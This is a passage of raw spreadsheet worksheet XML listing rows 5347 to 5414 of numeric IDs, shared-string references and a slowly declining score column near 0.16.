      <c r="D5347" s="2">
        <v>1.0</v>
      </c>
      <c r="E5347" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5347" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="5348" ht="15.75" customHeight="1">
      <c r="A5348" s="1">
        <v>28685.0</v>
      </c>
      <c r="B5348" s="2">
        <v>2.7578109E7</v>
      </c>
      <c r="C5348" s="2" t="s">
        <v>5083</v>
      </c>
      <c r="D5348" s="2">
        <v>1.0</v>
      </c>
      <c r="E5348" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5348" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="5349" ht="15.75" customHeight="1">
      <c r="A5349" s="1">
        <v>21979.0</v>
      </c>
      <c r="B5349" s="2">
        <v>2.9329274E7</v>
      </c>
      <c r="C5349" s="2" t="s">
        <v>5110</v>
      </c>
      <c r="D5349" s="2">
        <v>1.0</v>
      </c>
      <c r="E5349" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5349" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="5350" ht="15.75" customHeight="1">
      <c r="A5350" s="1">
        <v>27274.0</v>
      </c>
      <c r="B5350" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5350" s="2" t="s">
        <v>5111</v>
      </c>
      <c r="D5350" s="2">
        <v>1.0</v>
      </c>
      <c r="E5350" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5350" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="5351" ht="15.75" customHeight="1">
      <c r="A5351" s="1">
        <v>33011.0</v>
      </c>
      <c r="B5351" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C5351" s="2" t="s">
        <v>5112</v>
      </c>
      <c r="D5351" s="2">
        <v>1.0</v>
      </c>
      <c r="E5351" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5351" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="5352" ht="15.75" customHeight="1">
      <c r="A5352" s="1">
        <v>32271.0</v>
      </c>
      <c r="B5352" s="2">
        <v>5526634.0</v>
      </c>
      <c r="C5352" s="2" t="s">
        <v>5113</v>
      </c>
      <c r="D5352" s="2">
        <v>1.0</v>
      </c>
      <c r="E5352" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5352" s="2">
        <v>0.1637037037037037</v>
      </c>
    </row>
    <row r="5353" ht="15.75" customHeight="1">
      <c r="A5353" s="1">
        <v>28362.0</v>
      </c>
      <c r="B5353" s="2">
        <v>2.6021273E7</v>
      </c>
      <c r="C5353" s="2" t="s">
        <v>5114</v>
      </c>
      <c r="D5353" s="2">
        <v>1.0</v>
      </c>
      <c r="E5353" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5353" s="2">
        <v>0.1633499170812604</v>
      </c>
    </row>
    <row r="5354" ht="15.75" customHeight="1">
      <c r="A5354" s="1">
        <v>31659.0</v>
      </c>
      <c r="B5354" s="2">
        <v>5.1724975E7</v>
      </c>
      <c r="C5354" s="2" t="s">
        <v>5115</v>
      </c>
      <c r="D5354" s="2">
        <v>1.0</v>
      </c>
      <c r="E5354" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5354" s="2">
        <v>0.1632478632478633</v>
      </c>
    </row>
    <row r="5355" ht="15.75" customHeight="1">
      <c r="A5355" s="1">
        <v>26711.0</v>
      </c>
      <c r="B5355" s="2">
        <v>1.8196321E7</v>
      </c>
      <c r="C5355" s="2" t="s">
        <v>5116</v>
      </c>
      <c r="D5355" s="2">
        <v>1.0</v>
      </c>
      <c r="E5355" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5355" s="2">
        <v>0.1628086419753087</v>
      </c>
    </row>
    <row r="5356" ht="15.75" customHeight="1">
      <c r="A5356" s="1">
        <v>29744.0</v>
      </c>
      <c r="B5356" s="2">
        <v>3.4656878E7</v>
      </c>
      <c r="C5356" s="2" t="s">
        <v>5117</v>
      </c>
      <c r="D5356" s="2">
        <v>1.0</v>
      </c>
      <c r="E5356" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5356" s="2">
        <v>0.1627777777777777</v>
      </c>
    </row>
    <row r="5357" ht="15.75" customHeight="1">
      <c r="A5357" s="1">
        <v>31236.0</v>
      </c>
      <c r="B5357" s="2">
        <v>4.9283963E7</v>
      </c>
      <c r="C5357" s="2" t="s">
        <v>5118</v>
      </c>
      <c r="D5357" s="2">
        <v>1.0</v>
      </c>
      <c r="E5357" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5357" s="2">
        <v>0.1626506024096386</v>
      </c>
    </row>
    <row r="5358" ht="15.75" customHeight="1">
      <c r="A5358" s="1">
        <v>22834.0</v>
      </c>
      <c r="B5358" s="2">
        <v>4.6473223E7</v>
      </c>
      <c r="C5358" s="2" t="s">
        <v>5119</v>
      </c>
      <c r="D5358" s="2">
        <v>1.0</v>
      </c>
      <c r="E5358" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5358" s="2">
        <v>0.1623263888888889</v>
      </c>
    </row>
    <row r="5359" ht="15.75" customHeight="1">
      <c r="A5359" s="1">
        <v>28461.0</v>
      </c>
      <c r="B5359" s="2">
        <v>2.661034E7</v>
      </c>
      <c r="C5359" s="2" t="s">
        <v>5120</v>
      </c>
      <c r="D5359" s="2">
        <v>1.0</v>
      </c>
      <c r="E5359" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5359" s="2">
        <v>0.1622222222222223</v>
      </c>
    </row>
    <row r="5360" ht="15.75" customHeight="1">
      <c r="A5360" s="1">
        <v>31603.0</v>
      </c>
      <c r="B5360" s="2">
        <v>5134326.0</v>
      </c>
      <c r="C5360" s="2" t="s">
        <v>5121</v>
      </c>
      <c r="D5360" s="2">
        <v>1.0</v>
      </c>
      <c r="E5360" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5360" s="2">
        <v>0.1622222222222223</v>
      </c>
    </row>
    <row r="5361" ht="15.75" customHeight="1">
      <c r="A5361" s="1">
        <v>26041.0</v>
      </c>
      <c r="B5361" s="2">
        <v>1.5460167E7</v>
      </c>
      <c r="C5361" s="2" t="s">
        <v>5122</v>
      </c>
      <c r="D5361" s="2">
        <v>1.0</v>
      </c>
      <c r="E5361" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5361" s="2">
        <v>0.1622222222222222</v>
      </c>
    </row>
    <row r="5362" ht="15.75" customHeight="1">
      <c r="A5362" s="1">
        <v>24360.0</v>
      </c>
      <c r="B5362" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C5362" s="2" t="s">
        <v>5123</v>
      </c>
      <c r="D5362" s="2">
        <v>1.0</v>
      </c>
      <c r="E5362" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5362" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="5363" ht="15.75" customHeight="1">
      <c r="A5363" s="1">
        <v>29483.0</v>
      </c>
      <c r="B5363" s="2">
        <v>3.2469301E7</v>
      </c>
      <c r="C5363" s="2" t="s">
        <v>5124</v>
      </c>
      <c r="D5363" s="2">
        <v>1.0</v>
      </c>
      <c r="E5363" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5363" s="2">
        <v>0.1621004566210046</v>
      </c>
    </row>
    <row r="5364" ht="15.75" customHeight="1">
      <c r="A5364" s="1">
        <v>33776.0</v>
      </c>
      <c r="B5364" s="2">
        <v>8674953.0</v>
      </c>
      <c r="C5364" s="2" t="s">
        <v>5125</v>
      </c>
      <c r="D5364" s="2">
        <v>1.0</v>
      </c>
      <c r="E5364" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5364" s="2">
        <v>0.1621004566210046</v>
      </c>
    </row>
    <row r="5365" ht="15.75" customHeight="1">
      <c r="A5365" s="1">
        <v>22275.0</v>
      </c>
      <c r="B5365" s="2">
        <v>3.3223448E7</v>
      </c>
      <c r="C5365" s="2" t="s">
        <v>5126</v>
      </c>
      <c r="D5365" s="2">
        <v>1.0</v>
      </c>
      <c r="E5365" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5365" s="2">
        <v>0.1618773946360153</v>
      </c>
    </row>
    <row r="5366" ht="15.75" customHeight="1">
      <c r="A5366" s="1">
        <v>23311.0</v>
      </c>
      <c r="B5366" s="2">
        <v>5414879.0</v>
      </c>
      <c r="C5366" s="2" t="s">
        <v>5126</v>
      </c>
      <c r="D5366" s="2">
        <v>1.0</v>
      </c>
      <c r="E5366" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5366" s="2">
        <v>0.1618773946360153</v>
      </c>
    </row>
    <row r="5367" ht="15.75" customHeight="1">
      <c r="A5367" s="1">
        <v>27278.0</v>
      </c>
      <c r="B5367" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5367" s="2" t="s">
        <v>5111</v>
      </c>
      <c r="D5367" s="2">
        <v>1.0</v>
      </c>
      <c r="E5367" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5367" s="2">
        <v>0.1618773946360153</v>
      </c>
    </row>
    <row r="5368" ht="15.75" customHeight="1">
      <c r="A5368" s="1">
        <v>27208.0</v>
      </c>
      <c r="B5368" s="2">
        <v>2.0956361E7</v>
      </c>
      <c r="C5368" s="2" t="s">
        <v>5127</v>
      </c>
      <c r="D5368" s="2">
        <v>1.0</v>
      </c>
      <c r="E5368" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5368" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="5369" ht="15.75" customHeight="1">
      <c r="A5369" s="1">
        <v>29025.0</v>
      </c>
      <c r="B5369" s="2">
        <v>3.0100945E7</v>
      </c>
      <c r="C5369" s="2" t="s">
        <v>5128</v>
      </c>
      <c r="D5369" s="2">
        <v>1.0</v>
      </c>
      <c r="E5369" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5369" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="5370" ht="15.75" customHeight="1">
      <c r="A5370" s="1">
        <v>23328.0</v>
      </c>
      <c r="B5370" s="2">
        <v>5.4559825E7</v>
      </c>
      <c r="C5370" s="2" t="s">
        <v>5058</v>
      </c>
      <c r="D5370" s="2">
        <v>1.0</v>
      </c>
      <c r="E5370" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5370" s="2">
        <v>0.1616915422885573</v>
      </c>
    </row>
    <row r="5371" ht="15.75" customHeight="1">
      <c r="A5371" s="1">
        <v>25226.0</v>
      </c>
      <c r="B5371" s="2">
        <v>1.3328923E7</v>
      </c>
      <c r="C5371" s="2" t="s">
        <v>5129</v>
      </c>
      <c r="D5371" s="2">
        <v>1.0</v>
      </c>
      <c r="E5371" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5371" s="2">
        <v>0.1616915422885573</v>
      </c>
    </row>
    <row r="5372" ht="15.75" customHeight="1">
      <c r="A5372" s="1">
        <v>27882.0</v>
      </c>
      <c r="B5372" s="2">
        <v>2.3569926E7</v>
      </c>
      <c r="C5372" s="2" t="s">
        <v>5130</v>
      </c>
      <c r="D5372" s="2">
        <v>1.0</v>
      </c>
      <c r="E5372" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5372" s="2">
        <v>0.1616915422885573</v>
      </c>
    </row>
    <row r="5373" ht="15.75" customHeight="1">
      <c r="A5373" s="1">
        <v>33918.0</v>
      </c>
      <c r="B5373" s="2">
        <v>9250180.0</v>
      </c>
      <c r="C5373" s="2" t="s">
        <v>5131</v>
      </c>
      <c r="D5373" s="2">
        <v>1.0</v>
      </c>
      <c r="E5373" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5373" s="2">
        <v>0.1616809116809117</v>
      </c>
    </row>
    <row r="5374" ht="15.75" customHeight="1">
      <c r="A5374" s="1">
        <v>22286.0</v>
      </c>
      <c r="B5374" s="2">
        <v>3.341469E7</v>
      </c>
      <c r="C5374" s="2" t="s">
        <v>5132</v>
      </c>
      <c r="D5374" s="2">
        <v>1.0</v>
      </c>
      <c r="E5374" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5374" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="5375" ht="15.75" customHeight="1">
      <c r="A5375" s="1">
        <v>25198.0</v>
      </c>
      <c r="B5375" s="2">
        <v>1.3200714E7</v>
      </c>
      <c r="C5375" s="2" t="s">
        <v>5133</v>
      </c>
      <c r="D5375" s="2">
        <v>1.0</v>
      </c>
      <c r="E5375" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5375" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="5376" ht="15.75" customHeight="1">
      <c r="A5376" s="1">
        <v>26712.0</v>
      </c>
      <c r="B5376" s="2">
        <v>1.821322E7</v>
      </c>
      <c r="C5376" s="2" t="s">
        <v>5134</v>
      </c>
      <c r="D5376" s="2">
        <v>1.0</v>
      </c>
      <c r="E5376" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5376" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="5377" ht="15.75" customHeight="1">
      <c r="A5377" s="1">
        <v>33765.0</v>
      </c>
      <c r="B5377" s="2">
        <v>8633438.0</v>
      </c>
      <c r="C5377" s="2" t="s">
        <v>5135</v>
      </c>
      <c r="D5377" s="2">
        <v>1.0</v>
      </c>
      <c r="E5377" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5377" s="2">
        <v>0.1613475177304964</v>
      </c>
    </row>
    <row r="5378" ht="15.75" customHeight="1">
      <c r="A5378" s="1">
        <v>29544.0</v>
      </c>
      <c r="B5378" s="2">
        <v>3.2990163E7</v>
      </c>
      <c r="C5378" s="2" t="s">
        <v>5136</v>
      </c>
      <c r="D5378" s="2">
        <v>1.0</v>
      </c>
      <c r="E5378" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5378" s="2">
        <v>0.1612654320987655</v>
      </c>
    </row>
    <row r="5379" ht="15.75" customHeight="1">
      <c r="A5379" s="1">
        <v>25258.0</v>
      </c>
      <c r="B5379" s="2">
        <v>1.3387053E7</v>
      </c>
      <c r="C5379" s="2" t="s">
        <v>5137</v>
      </c>
      <c r="D5379" s="2">
        <v>1.0</v>
      </c>
      <c r="E5379" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5379" s="2">
        <v>0.1610169491525424</v>
      </c>
    </row>
    <row r="5380" ht="15.75" customHeight="1">
      <c r="A5380" s="1">
        <v>8666.0</v>
      </c>
      <c r="B5380" s="2">
        <v>5.4355993E7</v>
      </c>
      <c r="C5380" s="2" t="s">
        <v>5138</v>
      </c>
      <c r="D5380" s="2">
        <v>1.0</v>
      </c>
      <c r="E5380" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5380" s="2">
        <v>0.1609477124183007</v>
      </c>
    </row>
    <row r="5381" ht="15.75" customHeight="1">
      <c r="A5381" s="1">
        <v>30849.0</v>
      </c>
      <c r="B5381" s="2">
        <v>4.5969134E7</v>
      </c>
      <c r="C5381" s="2" t="s">
        <v>5139</v>
      </c>
      <c r="D5381" s="2">
        <v>1.0</v>
      </c>
      <c r="E5381" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5381" s="2">
        <v>0.1609477124183007</v>
      </c>
    </row>
    <row r="5382" ht="15.75" customHeight="1">
      <c r="A5382" s="1">
        <v>32875.0</v>
      </c>
      <c r="B5382" s="2">
        <v>6326286.0</v>
      </c>
      <c r="C5382" s="2" t="s">
        <v>5140</v>
      </c>
      <c r="D5382" s="2">
        <v>1.0</v>
      </c>
      <c r="E5382" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5382" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="5383" ht="15.75" customHeight="1">
      <c r="A5383" s="1">
        <v>33824.0</v>
      </c>
      <c r="B5383" s="2">
        <v>8916969.0</v>
      </c>
      <c r="C5383" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="D5383" s="2">
        <v>1.0</v>
      </c>
      <c r="E5383" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5383" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="5384" ht="15.75" customHeight="1">
      <c r="A5384" s="1">
        <v>21756.0</v>
      </c>
      <c r="B5384" s="2">
        <v>2.6081396E7</v>
      </c>
      <c r="C5384" s="2" t="s">
        <v>5142</v>
      </c>
      <c r="D5384" s="2">
        <v>1.0</v>
      </c>
      <c r="E5384" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5384" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="5385" ht="15.75" customHeight="1">
      <c r="A5385" s="1">
        <v>23078.0</v>
      </c>
      <c r="B5385" s="2">
        <v>5.0524786E7</v>
      </c>
      <c r="C5385" s="2" t="s">
        <v>5143</v>
      </c>
      <c r="D5385" s="2">
        <v>1.0</v>
      </c>
      <c r="E5385" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5385" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="5386" ht="15.75" customHeight="1">
      <c r="A5386" s="1">
        <v>30680.0</v>
      </c>
      <c r="B5386" s="2">
        <v>4.2362655E7</v>
      </c>
      <c r="C5386" s="2" t="s">
        <v>5144</v>
      </c>
      <c r="D5386" s="2">
        <v>1.0</v>
      </c>
      <c r="E5386" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5386" s="2">
        <v>0.1607744107744108</v>
      </c>
    </row>
    <row r="5387" ht="15.75" customHeight="1">
      <c r="A5387" s="1">
        <v>33790.0</v>
      </c>
      <c r="B5387" s="2">
        <v>8759191.0</v>
      </c>
      <c r="C5387" s="2" t="s">
        <v>5145</v>
      </c>
      <c r="D5387" s="2">
        <v>1.0</v>
      </c>
      <c r="E5387" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5387" s="2">
        <v>0.1607744107744108</v>
      </c>
    </row>
    <row r="5388" ht="15.75" customHeight="1">
      <c r="A5388" s="1">
        <v>31958.0</v>
      </c>
      <c r="B5388" s="2">
        <v>5.3104594E7</v>
      </c>
      <c r="C5388" s="2" t="s">
        <v>5146</v>
      </c>
      <c r="D5388" s="2">
        <v>1.0</v>
      </c>
      <c r="E5388" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5388" s="2">
        <v>0.1606060606060606</v>
      </c>
    </row>
    <row r="5389" ht="15.75" customHeight="1">
      <c r="A5389" s="1">
        <v>30884.0</v>
      </c>
      <c r="B5389" s="2">
        <v>4.6473222E7</v>
      </c>
      <c r="C5389" s="2" t="s">
        <v>5119</v>
      </c>
      <c r="D5389" s="2">
        <v>1.0</v>
      </c>
      <c r="E5389" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5389" s="2">
        <v>0.1605902777777778</v>
      </c>
    </row>
    <row r="5390" ht="15.75" customHeight="1">
      <c r="A5390" s="1">
        <v>23031.0</v>
      </c>
      <c r="B5390" s="2">
        <v>5.0053746E7</v>
      </c>
      <c r="C5390" s="2" t="s">
        <v>5147</v>
      </c>
      <c r="D5390" s="2">
        <v>1.0</v>
      </c>
      <c r="E5390" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5390" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="5391" ht="15.75" customHeight="1">
      <c r="A5391" s="1">
        <v>26359.0</v>
      </c>
      <c r="B5391" s="2">
        <v>1.686164E7</v>
      </c>
      <c r="C5391" s="2" t="s">
        <v>5148</v>
      </c>
      <c r="D5391" s="2">
        <v>1.0</v>
      </c>
      <c r="E5391" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5391" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="5392" ht="15.75" customHeight="1">
      <c r="A5392" s="1">
        <v>30599.0</v>
      </c>
      <c r="B5392" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C5392" s="2" t="s">
        <v>5149</v>
      </c>
      <c r="D5392" s="2">
        <v>1.0</v>
      </c>
      <c r="E5392" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5392" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="5393" ht="15.75" customHeight="1">
      <c r="A5393" s="1">
        <v>27132.0</v>
      </c>
      <c r="B5393" s="2">
        <v>2.0745954E7</v>
      </c>
      <c r="C5393" s="2" t="s">
        <v>5150</v>
      </c>
      <c r="D5393" s="2">
        <v>1.0</v>
      </c>
      <c r="E5393" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5393" s="2">
        <v>0.1601654846335697</v>
      </c>
    </row>
    <row r="5394" ht="15.75" customHeight="1">
      <c r="A5394" s="1">
        <v>27461.0</v>
      </c>
      <c r="B5394" s="2">
        <v>2.1987265E7</v>
      </c>
      <c r="C5394" s="2" t="s">
        <v>5151</v>
      </c>
      <c r="D5394" s="2">
        <v>1.0</v>
      </c>
      <c r="E5394" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5394" s="2">
        <v>0.1600877192982456</v>
      </c>
    </row>
    <row r="5395" ht="15.75" customHeight="1">
      <c r="A5395" s="1">
        <v>29372.0</v>
      </c>
      <c r="B5395" s="2">
        <v>3.1716799E7</v>
      </c>
      <c r="C5395" s="2" t="s">
        <v>5152</v>
      </c>
      <c r="D5395" s="2">
        <v>1.0</v>
      </c>
      <c r="E5395" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5395" s="2">
        <v>0.1598290598290599</v>
      </c>
    </row>
    <row r="5396" ht="15.75" customHeight="1">
      <c r="A5396" s="1">
        <v>33934.0</v>
      </c>
      <c r="B5396" s="2">
        <v>9284107.0</v>
      </c>
      <c r="C5396" s="2" t="s">
        <v>5153</v>
      </c>
      <c r="D5396" s="2">
        <v>1.0</v>
      </c>
      <c r="E5396" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5396" s="2">
        <v>0.1598290598290599</v>
      </c>
    </row>
    <row r="5397" ht="15.75" customHeight="1">
      <c r="A5397" s="1">
        <v>30050.0</v>
      </c>
      <c r="B5397" s="2">
        <v>3625040.0</v>
      </c>
      <c r="C5397" s="2" t="s">
        <v>5154</v>
      </c>
      <c r="D5397" s="2">
        <v>1.0</v>
      </c>
      <c r="E5397" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5397" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="5398" ht="15.75" customHeight="1">
      <c r="A5398" s="1">
        <v>30191.0</v>
      </c>
      <c r="B5398" s="2">
        <v>3.7230875E7</v>
      </c>
      <c r="C5398" s="2" t="s">
        <v>5155</v>
      </c>
      <c r="D5398" s="2">
        <v>1.0</v>
      </c>
      <c r="E5398" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5398" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="5399" ht="15.75" customHeight="1">
      <c r="A5399" s="1">
        <v>27269.0</v>
      </c>
      <c r="B5399" s="2">
        <v>2.1219188E7</v>
      </c>
      <c r="C5399" s="2" t="s">
        <v>5156</v>
      </c>
      <c r="D5399" s="2">
        <v>1.0</v>
      </c>
      <c r="E5399" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5399" s="2">
        <v>0.1596119929453263</v>
      </c>
    </row>
    <row r="5400" ht="15.75" customHeight="1">
      <c r="A5400" s="1">
        <v>20929.0</v>
      </c>
      <c r="B5400" s="2">
        <v>1.642125E7</v>
      </c>
      <c r="C5400" s="2" t="s">
        <v>5157</v>
      </c>
      <c r="D5400" s="2">
        <v>1.0</v>
      </c>
      <c r="E5400" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5400" s="2">
        <v>0.1595238095238096</v>
      </c>
    </row>
    <row r="5401" ht="15.75" customHeight="1">
      <c r="A5401" s="1">
        <v>29680.0</v>
      </c>
      <c r="B5401" s="2">
        <v>3.4025453E7</v>
      </c>
      <c r="C5401" s="2" t="s">
        <v>5158</v>
      </c>
      <c r="D5401" s="2">
        <v>1.0</v>
      </c>
      <c r="E5401" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5401" s="2">
        <v>0.1590909090909091</v>
      </c>
    </row>
    <row r="5402" ht="15.75" customHeight="1">
      <c r="A5402" s="1">
        <v>20448.0</v>
      </c>
      <c r="B5402" s="2">
        <v>1.2492221E7</v>
      </c>
      <c r="C5402" s="2" t="s">
        <v>5159</v>
      </c>
      <c r="D5402" s="2">
        <v>1.0</v>
      </c>
      <c r="E5402" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5402" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="5403" ht="15.75" customHeight="1">
      <c r="A5403" s="1">
        <v>23993.0</v>
      </c>
      <c r="B5403" s="2">
        <v>9219921.0</v>
      </c>
      <c r="C5403" s="2" t="s">
        <v>5160</v>
      </c>
      <c r="D5403" s="2">
        <v>1.0</v>
      </c>
      <c r="E5403" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5403" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="5404" ht="15.75" customHeight="1">
      <c r="A5404" s="1">
        <v>27286.0</v>
      </c>
      <c r="B5404" s="2">
        <v>2.1239261E7</v>
      </c>
      <c r="C5404" s="2" t="s">
        <v>5161</v>
      </c>
      <c r="D5404" s="2">
        <v>1.0</v>
      </c>
      <c r="E5404" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5404" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="5405" ht="15.75" customHeight="1">
      <c r="A5405" s="1">
        <v>32026.0</v>
      </c>
      <c r="B5405" s="2">
        <v>5.3591903E7</v>
      </c>
      <c r="C5405" s="2" t="s">
        <v>5162</v>
      </c>
      <c r="D5405" s="2">
        <v>1.0</v>
      </c>
      <c r="E5405" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5405" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="5406" ht="15.75" customHeight="1">
      <c r="A5406" s="1">
        <v>33913.0</v>
      </c>
      <c r="B5406" s="2">
        <v>9236138.0</v>
      </c>
      <c r="C5406" s="2" t="s">
        <v>5160</v>
      </c>
      <c r="D5406" s="2">
        <v>1.0</v>
      </c>
      <c r="E5406" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5406" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="5407" ht="15.75" customHeight="1">
      <c r="A5407" s="1">
        <v>782.0</v>
      </c>
      <c r="B5407" s="2">
        <v>2.1142664E7</v>
      </c>
      <c r="C5407" s="2" t="s">
        <v>5163</v>
      </c>
      <c r="D5407" s="2">
        <v>1.0</v>
      </c>
      <c r="E5407" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5407" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="5408" ht="15.75" customHeight="1">
      <c r="A5408" s="1">
        <v>32662.0</v>
      </c>
      <c r="B5408" s="2">
        <v>5914198.0</v>
      </c>
      <c r="C5408" s="2" t="s">
        <v>5164</v>
      </c>
      <c r="D5408" s="2">
        <v>1.0</v>
      </c>
      <c r="E5408" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5408" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="5409" ht="15.75" customHeight="1">
      <c r="A5409" s="1">
        <v>33354.0</v>
      </c>
      <c r="B5409" s="2">
        <v>7615453.0</v>
      </c>
      <c r="C5409" s="2" t="s">
        <v>5165</v>
      </c>
      <c r="D5409" s="2">
        <v>1.0</v>
      </c>
      <c r="E5409" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5409" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="5410" ht="15.75" customHeight="1">
      <c r="A5410" s="1">
        <v>30209.0</v>
      </c>
      <c r="B5410" s="2">
        <v>3.7375954E7</v>
      </c>
      <c r="C5410" s="2" t="s">
        <v>5166</v>
      </c>
      <c r="D5410" s="2">
        <v>1.0</v>
      </c>
      <c r="E5410" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5410" s="2">
        <v>0.1586151368760065</v>
      </c>
    </row>
    <row r="5411" ht="15.75" customHeight="1">
      <c r="A5411" s="1">
        <v>33941.0</v>
      </c>
      <c r="B5411" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C5411" s="2" t="s">
        <v>5167</v>
      </c>
      <c r="D5411" s="2">
        <v>1.0</v>
      </c>
      <c r="E5411" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5411" s="2">
        <v>0.1586021505376345</v>
      </c>
    </row>
    <row r="5412" ht="15.75" customHeight="1">
      <c r="A5412" s="1">
        <v>24090.0</v>
      </c>
      <c r="B5412" s="2">
        <v>9764411.0</v>
      </c>
      <c r="C5412" s="2" t="s">
        <v>5168</v>
      </c>
      <c r="D5412" s="2">
        <v>1.0</v>
      </c>
      <c r="E5412" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5412" s="2">
        <v>0.1586021505376344</v>
      </c>
    </row>
    <row r="5413" ht="15.75" customHeight="1">
      <c r="A5413" s="1">
        <v>28326.0</v>
      </c>
      <c r="B5413" s="2">
        <v>2.5854841E7</v>
      </c>
      <c r="C5413" s="2" t="s">
        <v>5169</v>
      </c>
      <c r="D5413" s="2">
        <v>1.0</v>
      </c>
      <c r="E5413" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5413" s="2">
        <v>0.158374792703151</v>
      </c>
    </row>
    <row r="5414" ht="15.75" customHeight="1">
      <c r="A5414" s="1">
        <v>21079.0</v>
      </c>
      <c r="B5414" s="2">
        <v>1.7998825E7</v>
      </c>
      <c r="C5414" s="2" t="s">
        <v>5170</v>
      </c>
      <c r="D5414" s="2">
        <v>1.0</v>
      </c>
